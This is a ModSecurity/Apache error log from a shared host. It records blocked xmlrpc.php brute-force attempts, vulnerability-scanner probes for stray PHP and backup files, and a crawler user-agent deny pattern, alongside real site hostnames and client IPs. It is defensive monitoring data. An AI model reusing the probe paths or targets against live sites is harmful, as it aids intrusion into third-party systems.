[Tue May 26 15:52:49.057371 2026] [security2:error] [pid 745492:tid 745702] [client 223.123.35.44:36247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0eYmEQglTmoWcfxKFmAAAANI"]
[Tue May 26 15:52:49.057507 2026] [security2:error] [pid 745492:tid 745702] [client 223.123.35.44:36247] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0eYmEQglTmoWcfxKFmAAAANI"]
[Tue May 26 15:52:50.909273 2026] [security2:error] [pid 747840:tid 748027] [client 143.110.243.118:32882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/thesmartestx.php"] [unique_id "ahV0eom6MwAuYuZKxvn71wAAAUM"]
[Tue May 26 15:52:51.074819 2026] [security2:error] [pid 747840:tid 748023] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0eom6MwAuYuZKxvn71gAAAT8"]
[Tue May 26 15:52:51.186769 2026] [security2:error] [pid 747840:tid 747984] [client 103.44.52.196:43222] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0e4m6MwAuYuZKxvn72wAAARg"]
[Tue May 26 15:52:51.186938 2026] [security2:error] [pid 747840:tid 747984] [client 103.44.52.196:43222] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0e4m6MwAuYuZKxvn72wAAARg"]
[Tue May 26 15:52:51.599675 2026] [security2:error] [pid 747840:tid 748054] [client 103.153.130.62:56355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0e4m6MwAuYuZKxvn75QAAAV4"]
[Tue May 26 15:52:51.600170 2026] [security2:error] [pid 747840:tid 748054] [client 103.153.130.62:56355] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0e4m6MwAuYuZKxvn75QAAAV4"]
[Tue May 26 15:52:53.681156 2026] [security2:error] [pid 745492:tid 745668] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0fYmEQglTmoWcfxKF0wAAALA"]
[Tue May 26 15:52:54.167244 2026] [security2:error] [pid 747840:tid 747982] [client 223.123.35.44:36249] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0fom6MwAuYuZKxvn8HgAAARY"]
[Tue May 26 15:52:54.167355 2026] [security2:error] [pid 747840:tid 747982] [client 223.123.35.44:36249] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0fom6MwAuYuZKxvn8HgAAARY"]
[Tue May 26 15:52:55.726854 2026] [security2:error] [pid 747840:tid 747993] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0f4m6MwAuYuZKxvn8PgAAASE"]
[Tue May 26 15:52:56.064885 2026] [security2:error] [pid 747840:tid 748060] [client 106.219.85.83:29802] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0f4m6MwAuYuZKxvn8TAAAAWQ"]
[Tue May 26 15:52:56.065100 2026] [security2:error] [pid 747840:tid 748060] [client 106.219.85.83:29802] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0f4m6MwAuYuZKxvn8TAAAAWQ"]
[Tue May 26 15:52:57.722374 2026] [security2:error] [pid 747840:tid 747970] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0gYm6MwAuYuZKxvn8XgAAAQo"]
[Tue May 26 15:52:59.848750 2026] [security2:error] [pid 745492:tid 745649] [client 32.193.60.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.panda-eco.com"] [uri "/index.php"] [unique_id "ahV0g4mEQglTmoWcfxKGBAAAAJ0"]
[Tue May 26 15:52:59.957736 2026] [security2:error] [pid 747840:tid 747995] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0g4m6MwAuYuZKxvn8fwAAASM"]
[Tue May 26 15:53:00.130675 2026] [security2:error] [pid 745492:tid 745703] [client 143.110.243.118:41786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/zcanp.php"] [unique_id "ahV0hImEQglTmoWcfxKGCgAAANM"]
[Tue May 26 15:53:00.731033 2026] [security2:error] [pid 745492:tid 745666] [client 114.119.136.215:38595] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "virgence.com"] [uri "/index.php/tag/unit-testing/"] [unique_id "ahV0hImEQglTmoWcfxKGDwAAAK4"], referer: https://virgence.com/index.php/tag/unit-testing/
[Tue May 26 15:53:01.194574 2026] [security2:error] [pid 745492:tid 745634] [client 147.92.54.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV0hYmEQglTmoWcfxKGFQAAAI4"], referer: https://www.anujtradingco.com/
[Tue May 26 15:53:01.514835 2026] [security2:error] [pid 747840:tid 747974] [client 103.44.52.196:57220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0hYm6MwAuYuZKxvn8owAAAQ4"]
[Tue May 26 15:53:01.514966 2026] [security2:error] [pid 747840:tid 747974] [client 103.44.52.196:57220] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0hYm6MwAuYuZKxvn8owAAAQ4"]
[Tue May 26 15:53:02.093992 2026] [security2:error] [pid 747840:tid 748016] [client 103.153.130.62:56652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0hom6MwAuYuZKxvn8tgAAATg"]
[Tue May 26 15:53:02.094140 2026] [security2:error] [pid 747840:tid 748016] [client 103.153.130.62:56652] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0hom6MwAuYuZKxvn8tgAAATg"]
[Tue May 26 15:53:02.138536 2026] [security2:error] [pid 747840:tid 748072] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0hYm6MwAuYuZKxvn8pgAAAXA"]
[Tue May 26 15:53:02.171066 2026] [autoindex:error] [pid 747840:tid 748030] [client 40.160.16.154:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:53:02.548711 2026] [security2:error] [pid 747840:tid 748018] [client 147.92.54.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV0hom6MwAuYuZKxvn8wQAAATo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1457475&moderation-hash=cb05a27ddb4c2ccdc8514fd0d20f8332
[Tue May 26 15:53:03.407387 2026] [security2:error] [pid 747840:tid 748024] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0hom6MwAuYuZKxvn8zgAAAUA"]
[Tue May 26 15:53:05.772173 2026] [security2:error] [pid 747840:tid 747987] [client 147.92.54.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV0iYm6MwAuYuZKxvn9CgAAARs"], referer: https://anujtradingco.com
[Tue May 26 15:53:06.084948 2026] [security2:error] [pid 747840:tid 748089] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0iYm6MwAuYuZKxvn9BQAAAYE"]
[Tue May 26 15:53:06.612127 2026] [security2:error] [pid 747840:tid 748075] [client 106.219.85.83:5147] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0iom6MwAuYuZKxvn9IAAAAXM"]
[Tue May 26 15:53:06.612245 2026] [security2:error] [pid 747840:tid 748075] [client 106.219.85.83:5147] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0iom6MwAuYuZKxvn9IAAAAXM"]
[Tue May 26 15:53:07.579262 2026] [security2:error] [pid 745492:tid 745660] [client 74.7.230.48:39932] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "mail.rbkgroups.co.in"] [uri "/cgi-sys/404.html"] [unique_id "ahV0i4mEQglTmoWcfxKGNwAAqFE"]
[Tue May 26 15:53:08.114442 2026] [security2:error] [pid 747840:tid 748077] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0i4m6MwAuYuZKxvn9QQAAAXU"]
[Tue May 26 15:53:08.226895 2026] [security2:error] [pid 747840:tid 748088] [client 202.76.143.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0i4m6MwAuYuZKxvn9RAAAAYA"]
[Tue May 26 15:53:08.867756 2026] [security2:error] [pid 747840:tid 747972] [client 74.7.241.174:54642] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.krishnawoodworks.com"] [uri "/cgi-sys/404.html"] [unique_id "ahV0jIm6MwAuYuZKxvn9YAAAAQw"]
[Tue May 26 15:53:09.189146 2026] [security2:error] [pid 747840:tid 748085] [client 185.191.171.1:51454] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahV0jYm6MwAuYuZKxvn9awAAAX0"]
[Tue May 26 15:53:09.189248 2026] [security2:error] [pid 747840:tid 748085] [client 185.191.171.1:51454] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahV0jYm6MwAuYuZKxvn9awAAAX0"]
[Tue May 26 15:53:09.596168 2026] [security2:error] [pid 745492:tid 745582] [remote 173.252.70.11:52190] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "huronwoodphysio.com"] [uri "/index.php"] [unique_id "ahV0jYmEQglTmoWcfxKGTQAA51Y"]
[Tue May 26 15:53:10.903452 2026] [security2:error] [pid 747840:tid 748011] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0jom6MwAuYuZKxvn9iAAAATM"]
[Tue May 26 15:53:11.022719 2026] [security2:error] [pid 745492:tid 745752] [client 112.86.225.192:43946] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "bhavisharchitects.com"] [uri "/"] [unique_id "ahV0j4mEQglTmoWcfxKGZwAAAQQ"]
[Tue May 26 15:53:11.022843 2026] [security2:error] [pid 745492:tid 745752] [client 112.86.225.192:43946] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "bhavisharchitects.com"] [uri "/"] [unique_id "ahV0j4mEQglTmoWcfxKGZwAAAQQ"]
[Tue May 26 15:53:12.068178 2026] [security2:error] [pid 745492:tid 745734] [client 103.44.52.196:35878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0kImEQglTmoWcfxKGfgAAAPI"]
[Tue May 26 15:53:12.068293 2026] [security2:error] [pid 745492:tid 745734] [client 103.44.52.196:35878] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0kImEQglTmoWcfxKGfgAAAPI"]
[Tue May 26 15:53:12.259834 2026] [security2:error] [pid 747840:tid 748005] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0j4m6MwAuYuZKxvn9qwAAAS0"]
[Tue May 26 15:53:12.843675 2026] [security2:error] [pid 745492:tid 745728] [client 45.148.10.159:39796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/api/objects/codes.php.save"] [unique_id "ahV0kImEQglTmoWcfxKGhgAAAOw"]
[Tue May 26 15:53:13.041832 2026] [security2:error] [pid 745492:tid 745694] [client 103.153.130.62:56955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0kImEQglTmoWcfxKGiAAAAMo"]
[Tue May 26 15:53:13.042035 2026] [security2:error] [pid 745492:tid 745694] [client 103.153.130.62:56955] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0kImEQglTmoWcfxKGiAAAAMo"]
[Tue May 26 15:53:14.382026 2026] [security2:error] [pid 745492:tid 745693] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0kYmEQglTmoWcfxKGkgAAAMk"]
[Tue May 26 15:53:14.473499 2026] [security2:error] [pid 745492:tid 745683] [client 114.119.138.235:50879] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahV0komEQglTmoWcfxKGnQAAAL8"], referer: https://www.glorodrc.com/index.php?route=product/product&product_id=107
[Tue May 26 15:53:15.701785 2026] [security2:error] [pid 747840:tid 748093] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0k4m6MwAuYuZKxvn95gAAAYU"]
[Tue May 26 15:53:16.761555 2026] [security2:error] [pid 745492:tid 745688] [client 223.123.35.44:36251] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0lImEQglTmoWcfxKGtwAAAMQ"]
[Tue May 26 15:53:16.761776 2026] [security2:error] [pid 745492:tid 745688] [client 223.123.35.44:36251] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV0lImEQglTmoWcfxKGtwAAAMQ"]
[Tue May 26 15:53:17.134574 2026] [security2:error] [pid 747840:tid 748024] [client 210.10.76.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV0lYm6MwAuYuZKxvn9_wAAAUA"], referer: https://www.anujtradingco.com/
[Tue May 26 15:53:17.135132 2026] [security2:error] [pid 747840:tid 747985] [client 210.10.76.91:42412] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahV0lIm6MwAuYuZKxvn9-gAAARk"], referer: https://www.anujtradingco.com/
[Tue May 26 15:53:17.159470 2026] [security2:error] [pid 745492:tid 745682] [client 106.219.85.83:24315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0lYmEQglTmoWcfxKGvgAAAL4"]
[Tue May 26 15:53:17.159565 2026] [security2:error] [pid 745492:tid 745682] [client 106.219.85.83:24315] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0lYmEQglTmoWcfxKGvgAAAL4"]
[Tue May 26 15:53:17.855038 2026] [security2:error] [pid 745492:tid 745643] [client 210.10.76.91:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV0lYmEQglTmoWcfxKGxAAAAJc"], referer: https://www.anujtradingco.com/
[Tue May 26 15:53:17.855644 2026] [security2:error] [pid 745492:tid 745649] [client 210.10.76.91:42418] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/si-contact-form/captcha/securimage_show.php"] [unique_id "ahV0lYmEQglTmoWcfxKGwwAAAJ0"], referer: https://www.anujtradingco.com/
[Tue May 26 15:53:18.075611 2026] [security2:error] [pid 747840:tid 748020] [client 74.7.230.22:56382] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "kingsclubmembership.com"] [uri "/index.php"] [unique_id "ahV0lYm6MwAuYuZKxvn-DwABPEk"]
[Tue May 26 15:53:18.421268 2026] [security2:error] [pid 747840:tid 747997] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0lYm6MwAuYuZKxvn-DgAAASU"]
[Tue May 26 15:53:18.972697 2026] [security2:error] [pid 745492:tid 745656] [client 74.7.244.58:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahV0lYmEQglTmoWcfxKGxgAApFo"]
[Tue May 26 15:53:20.753402 2026] [security2:error] [pid 747840:tid 747971] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0mIm6MwAuYuZKxvn-NQAAAQs"]
